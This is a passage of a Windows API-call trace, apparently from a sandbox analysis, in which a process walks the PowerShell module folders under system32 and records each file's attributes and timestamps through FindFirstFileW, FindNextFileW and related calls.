ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintManagement", cAlternateFileName="PRINTM~1")) returned 1 [0286.180] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0286.180] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0286.180] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0286.180] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflow", cAlternateFileName="PSWORK~1")) returned 1 [0286.181] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflowUtility", cAlternateFileName="PSWORK~2")) returned 1 [0286.181] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa719ec9, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa719ec9, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScheduledTasks", cAlternateFileName="SCHEDU~1")) returned 1 [0286.181] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot", cAlternateFileName="SECURE~1")) returned 1 [0286.181] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare", cAlternateFileName="")) returned 1 [0286.182] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness", cAlternateFileName="SMBWIT~1")) returned 1 [0286.182] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout", cAlternateFileName="STARTL~1")) returned 1 [0286.182] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage", cAlternateFileName="")) returned 1 [0286.182] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0286.182] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0286.183] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TrustedPlatformModule", cAlternateFileName="TRUSTE~1")) returned 1 [0286.183] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpnClient", cAlternateFileName="VPNCLI~1")) returned 1 [0286.183] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wdac", cAlternateFileName="")) returned 1 [0286.183] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="WINDOW~1")) returned 1 [0286.183] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsErrorReporting", cAlternateFileName="WINDOW~2")) returned 1 [0286.183] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsSearch", cAlternateFileName="WINDOW~3")) returned 1 [0286.183] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 1 [0286.183] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 0 [0286.184] FindClose (in: hFindFile=0x25b73f76910 | out: hFindFile=0x25b73f76910) returned 1 [0286.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb10) returned 1 [0286.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cad0) returned 1 [0286.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x653ef8c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0286.184] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\*"), lpFindFileData=0x653ef8c760 | out: lpFindFileData=0x653ef8c760*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73f76910 [0286.185] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.185] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0286.185] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0286.185] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0286.185] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0286.185] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 0 [0286.185] FindClose (in: hFindFile=0x25b73f76910 | out: hFindFile=0x25b73f76910) returned 1 [0286.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.186] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x653ef8c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0286.186] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\*"), lpFindFileData=0x653ef8c760 | out: lpFindFileData=0x653ef8c760*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73f775d0 [0286.186] FindNextFileW (in: hFindFile=0x25b73f775d0, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.186] FindNextFileW (in: hFindFile=0x25b73f775d0, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0286.186] FindNextFileW (in: hFindFile=0x25b73f775d0, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0286.186] FindNextFileW (in: hFindFile=0x25b73f775d0, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0286.186] FindNextFileW (in: hFindFile=0x25b73f775d0, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0286.186] FindNextFileW (in: hFindFile=0x25b73f775d0, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0286.186] FindClose (in: hFindFile=0x25b73f775d0 | out: hFindFile=0x25b73f775d0) returned 1 [0286.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.187] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x653ef8c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0286.187] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0286.187] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cb40 | out: lpFileInformation=0x653ef8cb40*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0286.187] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0286.187] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0286.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x653ef8c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0286.187] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\*"), lpFindFileData=0x653ef8c7c0 | out: lpFindFileData=0x653ef8c7c0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73f775d0 [0286.187] FindNextFileW (in: hFindFile=0x25b73f775d0, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.187] FindNextFileW (in: hFindFile=0x25b73f775d0, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0286.187] FindNextFileW (in: hFindFile=0x25b73f775d0, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0286.188] FindNextFileW (in: hFindFile=0x25b73f775d0, 